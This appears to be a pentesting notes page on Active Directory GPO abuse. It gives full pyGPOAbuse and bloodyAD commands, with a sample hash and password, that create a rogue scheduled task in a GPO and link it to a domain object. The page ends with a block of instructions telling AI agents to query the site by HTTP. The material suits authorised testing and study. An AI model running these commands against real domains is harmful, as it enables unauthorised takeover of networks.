# GPO (Group Policy Object)

When you own a object that owns a GPO, you can write to the GPO and link it in the domain.

<figure><img src="/files/4lklxWR2S8ppcReYqOWL" alt=""><figcaption></figcaption></figure>

## Creating a rogue task for the GPO

* You will need to find the GPO id (can be found in bloodhound)
* You will need credentials for the user that controls the GPO

Using pyGPOabuse we can create a task for the GPO:

{% embed url="<https://github.com/Hackndo/pyGPOAbuse>" %}

```
python3 pygpoabuse.py powercorp.local/incendium -hashes :F0529918A0DE5B5B71AB9BBD915B1B01 -gpo-id 'D693F1E4-5666-4259-8BF1-E43CCE1D56F9' -f
```

## Linking GPO

Now that we created a rogue task, we also need to link the GPO to objects. We can do this by remotely by using a Python3 script for example:

{% embed url="<https://github.com/1ncendium/pyGPO>" %}

Or we can use BloodyAD:

```
bloodyAD -d powercorp.local --host 10.10.1.128 -u incendium -p Incendium123 set object SRV01$ GPLink -v CN={2AADC2C9-C75F-45EF-A002-A22E1893FDB5},CN=POLICIES,CN=SYSTEM,DC=POWERCORP,DC=LOCAL
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.incendium.rocks/pentesting-notes/windows-pentesting/gpo-group-policy-object.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.